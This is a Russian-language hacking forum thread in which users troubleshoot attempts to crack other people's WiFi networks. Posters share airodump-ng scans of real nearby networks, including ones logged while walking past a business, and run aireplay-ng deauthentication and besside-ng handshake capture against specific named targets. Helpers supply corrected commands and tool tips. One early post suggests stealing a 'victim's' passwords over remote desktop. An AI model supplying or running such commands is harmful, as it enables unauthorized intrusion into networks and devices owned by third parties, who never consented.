 |
|

11.05.2015, 10:10
|
|
New Member
Регистрация: 09.05.2015
Сообщений: 8
Провел на форуме: 2424
Репутация:
0
|
|
Сообщение от binarymaster
На память не воспроизведу, но каждую описанную задачу можно погуглить немного.
Через телнет уже не вариант, муторно. Через удалённый рабочий стол - можно утянуть пароли, используя софт для восстановления забытых паролей. Если есть полный доступ к жертве, то последний вариант самый удобный. Для одновременной работы с пользователем без его "выкидывания" можно воспользоваться RDP Wrapper'ом.
А что за софт для восстановления паролей? Пароль то при этом не поменяется?
Можешь подробней? А то я профан, не могу найти ничего..(
Пытался подключиться удаленно к своему 2ому компу в сетке...не даёт! В чем дело? Ввожу имя компьютера, но выдает ошибку(
|
|
|

11.05.2015, 13:21
|
|
New Member
Регистрация: 09.05.2015
Сообщений: 62
Провел на форуме: 12701
Репутация:
0
|
|
Уже который день страдаю на хендшейками. Самая лакомая сетка и никак не хочет поддаваться.
Роутер настроен провайдером, у нас есть такие "Метросеть", роутер обозван Metro-144, канал не стандартный стоит: 6ch.
Так вот вопрос, может ли провайдер настроить так, чтобы не видны были подключенные к роутеру устройства?
Уже второй день скан стоит на хендшейки, сначала вручную, теперь пробую minidwep, все бесполезно, как будто не одного устройства так и не подключено.
Тут либо люди напрямую подключают комп к роутеру, либо что-то хитро настроено...
upd:
дождался я устройства, minidwep пытается снять хендейшк, но пока безрезультатно.
Есть идеи ребят?

|
|
|

12.05.2015, 14:14
|
|
Познающий
Регистрация: 09.05.2015
Сообщений: 51
Провел на форуме: 9951
Репутация:
1
|
|
Добрый день.
В первые пробую взломать пороль WiFi, установил ОС Kali Linux, работаю на ноутбуке от Lenovo G50-30.
Прочитал статью по ссылке (тоже на этом форуме), и много других.
Что я делал:
- подключил WiFi адаптер Alfa AWUS036H.
- переключил в режим мониторинга:
[CODE]
root@kali-Linux:~# airodump-ng mon0
CH 3 ][ Elapsed: 4 s ][ 2015-05-11 19:29
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BC:F6:85:BF:C0:E6 -59 2 0 0 4 54e WPA CCMP PSK Kira-
10:BF:48:E6:55:18 -70 4 0 0 6 54e WPA2 CCMP PSK Roofl
B0:B2  C  C:C5:59 -63 3 0 0 8 54e WPA2 CCMP PSK Archi
D4:21:22:53:CE:65 -76 6 0 0 8 54e WPA2 CCMP PSK MGTS_
B0:B2  C  C:C5:58 -67 11 0 0 8 54e WPA2 CCMP PSK Archi
60:A4:4C  E:45:48 -74 2 0 0 4 54e WPA2 CCMP PSK ASUS
C0:C1:C0:48:76:8F -74 2 0 0 2 54e. WPA2 CCMP PSK Alati
60:A4:4C:A2:B7:F8 -65 2 0 0 13 54e WPA2 CCMP PSK TAGNA
00:14  1:A5:4A:95 -67 2 0 0 11 54e. WPA2 CCMP PSK SPIDE
D8:50:E6  7:39:60 -67 12 3 0 6 54e WPA2 CCMP PSK Anako
00:22:15:71:2A:E5 -59 20 3 0 6 54 WPA TKIP PSK WL520
00:1C:F0:3B:C3:05 -66 18 4 1 6 54 . WPA TKIP PSK dlink
C4:6E:1F  5:AE:8A -71 2 0 0 6 54e. WPA2 CCMP PSK TP-LI
90:E6:BA:F1:6C:30 -57 3 2 0 6 54 WPA2 CCMP PSK proje
00:25:9C:F7:36:85 -53 21 0 0 9 54e. WPA2 CCMP PSK Port
D4:21:22:99:45:61 -75 3 0 0 1 54e WPA2 CCMP PSK MGTS_
00:17:9A:84:FD:45 -71 3 0 0 3 54 . WPA2 CCMP PSK 2b4A9
C2:9F  B:F7:43:B4 -69 0 3 0 1 -1 OPN
Lua: Error during loading:
[string "/usr/share/wireshark/init.lua"]:46: dofile has been disabled due to running Wireshark as superuser. See http://wiki.wireshark.org/CaptureSetup/CapturePrivileges for help in running Wireshark as an unprivileged user.
[/QUOTE]
Но всеже окрывает, и там ни чего нет, иногда есть но ни каких хендшейков, лишь информация о роутре и тому подобное.
через aircrack-ng, но все равно ни чего не вышло:
Код:
root@kali-Linux:~# aircrack-ng /wep.cap
Opening /wep.cap
read(file header) failed: Success
Read 0 packets.
No networks found, exiting.
Quitting aircrack-ng...
- снова перешел к airodump-ng, попробовал:
Код:
root@kali-Linux:~# airodump-ng --bssid CC:5D:4E:DA:11:C8 -c1 -w hachthis mon0
CH 1 ][ Elapsed: 59 mins ][ 2015-05-11 20:02 ][ fixed channel mon0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
CC:5D:4E:DA:11:C8 -60 0 5500 417 0 1 54e WPA2 CCMP PSK Sashko
BSSID STATION PWR Rate Lost Frames Probe
в этоже время пробовал откдючвть клиентов:
Код:
root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 mon0
21:08:34 Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1
21:08:34 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 -e Sashko mon0
21:08:41 Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1
21:08:41 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
- снова ни чего не вышло, только других способов больше не знаю.
В чем ошибка ума не приложу, весь русские и английские форумы и статьи прочитал и облазил, полностю в ТУПИКЕ.
Заранее благодарен.[/QUOTE][/QUOTE]
|
|
|

12.05.2015, 14:39
|
|
Banned
Регистрация: 16.12.2011
Сообщений: 82
Провел на форуме: 20078
Репутация:
0
|
|
Сообщение от Василий-Шишкин
Но всеже окрывает, и там ни чего нет, иногда есть но ни каких хендшейков, лишь информация о роутре и тому подобное.
Opening /wep.cap
read(file header) failed: Success
Read 0 packets.
No networks found, exiting.
- а что ты там хотел увидеть? у тебя и нет точек с WEP шифрованием.
- для перехвата в besside-ng точек с WPA надо хелп читать внимательно:
To get WPA handshake from a specific target (channel and BSSID):
# besside-ng -W -c 6 -b 00:00:11:22:33:44 mon0
|
|
|

12.05.2015, 14:47
|
|
Познающий
Регистрация: 09.05.2015
Сообщений: 51
Провел на форуме: 9951
Репутация:
1
|
|
Сообщение от ak_45
- а что ты там хотел увидеть? у тебя и нет точек с WEP шифрованием.
- для перехвата в besside-ng точек с WPA надо хелп читать внимательно:
To get WPA handshake from a specific target (channel and BSSID):
# besside-ng -W -c 6 -b 00:00:11:22:33:44 mon0
WEP - точки обязательно нужны? Автор же писал что это большая редкость, как я их найду тогда?
|
|
|

12.05.2015, 14:52
|
|
Познающий
Регистрация: 09.05.2015
Сообщений: 51
Провел на форуме: 9951
Репутация:
1
|
|
Слишком громко сказал, не найду. Шел около BMW центра:
Код:
CH 2 ][ Elapsed: 1 min ][ 2015-05-12 13:44
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:B3:6E:F6:22:9E -1 3 0 0 6 11 OPN HP3420
60:A4:4C:F0:1B:18 -58 71 36 0 6 54e. WPA2 CCMP PSK WEYLAND
-----> 1C:BD:B9:3E:1D:24 -58 132 116 0 1 54 . WEP WEP BMTWlan_1
10:FE:ED:36:F3:3E -66 93 0 0 6 54e. WPA2 CCMP PSK Belka
-----> 00:1F:1F:C5:F5:58 -68 121 0 0 11 54e WEP WEP Digitus304
00:22:55:57:51:00 -65 85 114 0 7 54e. OPN bmstu_staff
BC:F6:85:44:9B:CE -65 135 0 0 5 54e WPA CCMP PSK homeAL
EC:43:F6:08:E0:7C -64 89 7 0 4 54e WPA2 CCMP PSK sen_shamon
C0:4A:00:DF:4A:E6 -66 103 0 0 9 54e. WPA2 CCMP PSK s13195
B8:A3:86:14:13:F0 -66 126 0 0 2 54e WPA CCMP PSK instation
10:FE:ED:80:95:10 -66 9 0 0 8 54e. WPA2 CCMP PSK TP-LINK
1C:7E:E5:91:DB:4C -66 16 5 0 6 54e WPA CCMP PSK DIR-620
10:7B:EF:56:2B:BC -68 106 2 0 3 54e WEP WEP vpn9001
00:18:E7:E8:51:9B -69 25 0 0 9 54e. WPA2 CCMP PSK dlink
00:1E:E5:A0:27:B0 -67 53 56 1 6 54 WPA2 CCMP PSK Inet1125
00:1E:E5:A0:25:30 -69 88 72 0 11 54 WPA2 CCMP PSK Inet829
E0:CB:4E:0B:11:6F -68 57 3 0 6 54 WPA TKIP PSK Zahar
00:26:5A:18:D6:34 -68 48 0 0 12 54e. WPA2 TKIP PSK malahit_hall
C0:4A:00:E4:E3:46 -68 22 1 0 4 54e WPA2 CCMP PSK MNE NE JALKO
40:4A:03:79:81:70 -68 33 0 0 10 54e WPA2 CCMP PSK ZyXEL_KEENETIC_798170
FC:F5:28:65:0C:96 -68 107 0 0 1 54 WPA2 CCMP PSK ROBOT
00:22:B0:40:16:67 -69 94 2 0 3 54 . WPA2 TKIP PSK 208
E0:CB:4E:FC:7D:D5 -69 77 6 0 11 54 WPA TKIP PSK wild
0E:18:D6:47:E9:E0 -71 8 0 0 6 54e. WPA2 CCMP PSK Hololab_guest
58:6D:8F:36:D7:5A -69 8 3 0 6 54e WPA2 CCMP PSK SkyNet
00:27:22:E8:1E:62 -69 4 0 0 1 54e. WPA TKIP PSK ubnt11951
CC:5D:4E:FD:34:C8 -69 5 0 0 6 54e WPA2 CCMP PSK TOLSTY
00:03:7F:FE:00:00 -69 211 2 0 3 54 WPA2 CCMP PSK ibm506
B8:A3:86:0B:BF:1A -69 29 0 0 9 54e WPA CCMP PSK METRO
12:18:D6:47:E9:E0 -70 10 0 0 6 54e. WPA2 CCMP PSK
6A:28:5D:67:19:E8 -69 28 0 0 1 54e WPA2 CCMP PSK Keenetic-2528
E8:94:F6:E5:89:9C -70 15 0 0 10 54e. WPA2 CCMP PSK The_SpeeRT
0A:18:D6:47:E9:E0 -70 6 0 0 6 54e. WPA2 CCMP MGT Hololab
BC:F6:85:CA:33:D2 -71 53 0 0 11 54e WPA2 CCMP PSK DIR-615
34:08:04:13:0A:FE -73 2 0 0 11 54e WPA2 CCMP PSK Mixa83
28:28:5D:96:CA:24 -71 107 0 0 3 54e WPA2 CCMP PSK Keenetic-3064
90:4E:2B:E4:5B:48 -71 32 0 0 3 54e OPN HUAWEI-GLR29J
BC:EE:7B:65:EF:64 -71 31 0 0 10 54e WPA TKIP PSK VPN7505
00:21:D8:93:DC:50 -71 7 0 0 8 54e. OPN bmstu_staff
10:FE:ED:82:24:1E -72 17 0 0 11 54e. WPA2 CCMP PSK TP-LINK_82241E
C4:A8:1D:5B:BB:47 -71 25 0 0 1 54e WPA2 CCMP PSK Deonis2222
00:3A:9A:A5:6E:91 -73 10 0 0 11 54e. OPN bmstu_staff
00:3A:9A:A5:6E:99 -70 13 0 0 11 54e. OPN bmstu_guest
1C:7E:E5:E3:FA:52 -73 28 0 0 13 54e WPA2 TKIP PSK 72111
84:C9:B2:4C:DE:D5 -73 62 0 0 3 54e. WPA2 CCMP PSK s4929
B0:B2:DC:3E:65:4C -73 9 0 0 1 54e WPA2 CCMP PSK Army
28:28:5D:67:8D:34 -74 9 0 0 1 54e WPA2 CCMP PSK dimon0764
00:18:39:76:AA:CA -73 2 0 0 11 54 WPA TKIP PSK linksys
00:1E:E5:A0:27:20 -73 0 2 0 6 -1 WPA
90:94:E4:EF:32:38 -73 7 0 0 1 54e WPA2 CCMP PSK Kostik
40:4A:03:79:2F:95 -72 19 0 0 1 54e WPA2 CCMP PSK s10932
B0:B2:DC:5B:C7:C4 -73 16 1 0 1 54e WPA2 CCMP PSK SovAsQ
AC:22:0B:7C:B9:38 -76 12 0 0 13 54e WPA2 CCMP PSK BURGUY
00:14:D1:E2:D2:2A -75 6 0 0 1 54 . WPA2 TKIP PSK Bardak
EC:43:F6:E1:EE:BC -75 3 0 0 3 54e WPA2 CCMP PSK 119
40:4A:03:44:8A:BA -75 8 0 0 3 54 WPA TKIP PSK Pavel-PC
00:3A:9A:A5:6E:90 -75 1 0 0 11 54e. OPN bmstu_lb
E8:DE:27:C2:EC:1E -72 5 0 0 9 54e. WPA2 CCMP PSK O13311
сразу 2 штуки нашел.
Код:
root@kali-Linux:~# besside-ng -W -c 1 -b 1C:BD:B9:3E:1D:24 mon0
[13:57:01] Let's ride
[13:57:01] Resuming from besside.log
[13:57:01] Appending to wpa.cap
[13:57:01] Appending to wep.cap
[13:57:01] Logging to besside.log
[13:57:01] Can't attack BMTWlan_1
[13:57:01] All neighbors owned
Dying...
[13:57:01] TO-OWN [] OWNED []
Почему-то не хочет.
|
|
|

12.05.2015, 15:22
|
|
Banned
Регистрация: 16.12.2011
Сообщений: 82
Провел на форуме: 20078
Репутация:
0
|
|
Сообщение от Василий-Шишкин
Слишком громко сказал, не найду. Шел около BMW центра:
- ну тут есть, а в верхнем скрине не было.
- открывай besside.log и смотри что он тебе там наловил.
- флаг -W только для WPA.
- root@kali-Linux:~# besside-ng -W -c 1 -b 1C:BD:B9:3E:1D:24 mon0
зачем ты для WEP даёшь флаг -W ?
- для WPA запусти так просто может чё и словит:
root@kali-Linux:~# besside-ng -W mon0
|
|
|

12.05.2015, 15:35
|
|
Познающий
Регистрация: 09.05.2015
Сообщений: 51
Провел на форуме: 9951
Репутация:
1
|
|
Наконец-то найшел долгожданного клиента:
Код:
CH 6 ][ Elapsed: 5 mins ][ 2015-05-12 14:28 ][ fixed channel mon0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
60:A4:4C:F0:1B:18 -59 0 928 392 0 6 54e. WPA2 CCMP PSK WEYLAND
BSSID STATION PWR Rate Lost Frames Probe
60:A4:4C:F0:1B:18 B4:52:7E:97:D3:F4 -65 0 - 1 0 9
Отключаю клиента от сети:
Код:
root@kali-Linux:~# aireplay-ng --deauth 5 -e WEYLAND -a 60:A4:4C:F0:1B:18 -c B4:52:7E:97:D3:F4 mon0
14:26:59 Waiting for beacon frame (BSSID: 60:A4:4C:F0:1B:18) on channel -1
14:26:59 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
root@kali-Linux:~# aireplay-ng --deauth 5 -e WEYLAND -a 60:A4:4C:F0:1B:18 -c B4:52:7E:97:D3:F4 wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start wlan0 '
Sysfs injection support was not found either.
но ни чего не смог
Сообщение от ak_45
- ну тут есть, а в верхнем скрине не было.
- открывай besside.log и смотри что он тебе там наловил.
- флаг -W только для WPA.
- root@kali-Linux:~# besside-ng -W -c 1 -b 1C:BD:B9:3E:1D:24 mon0
зачем ты для WEP даёшь флаг -W ?
- для WPA запусти так просто может чё и словит:
root@kali-Linux:~# besside-ng -W mon0
-W что она делает?
Конкретный роутер пробую ломануть :
Код:
root@kali-Linux:~# besside-ng -W -c 6 -b 60:A4:4C:F0:1B:18 mon0
[14:24:16] Let's ride
[14:24:16] Resuming from besside.log
[14:24:16] Appending to wpa.cap
[14:24:16] Appending to wep.cap
[14:24:16] Logging to besside.log
[14:24:17] Got replayable packet for BMTWlan_1 [len 86]
[14:30:29] Got replayable packet for [len 86]
[14:35:00] - Attacking [WEYLAND] WPA - DEAUTH (know 2 clients)
жду пока, может чо получится.
|
|
|

12.05.2015, 15:49
|
|
Banned
Регистрация: 16.12.2011
Сообщений: 82
Провел на форуме: 20078
Репутация:
0
|
|
Сообщение от Василий-Шишкин
жду пока, может чо получится.
- ерундой страдаешь, запускай minidwep-gtk, она автоматом всё делает и для WPA и WEP.
|
|
|

12.05.2015, 16:00
|
|
Познающий
Регистрация: 09.05.2015
Сообщений: 51
Провел на форуме: 9951
Репутация:
1
|
|
Сообщение от ak_45
- ерундой страдаешь, запускай minidwep-gtk, она автоматом всё делает и для WPA и WEP.
Можете написать целый код или хотябы пример, я новичок в этом не могу так сходу все понимать.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|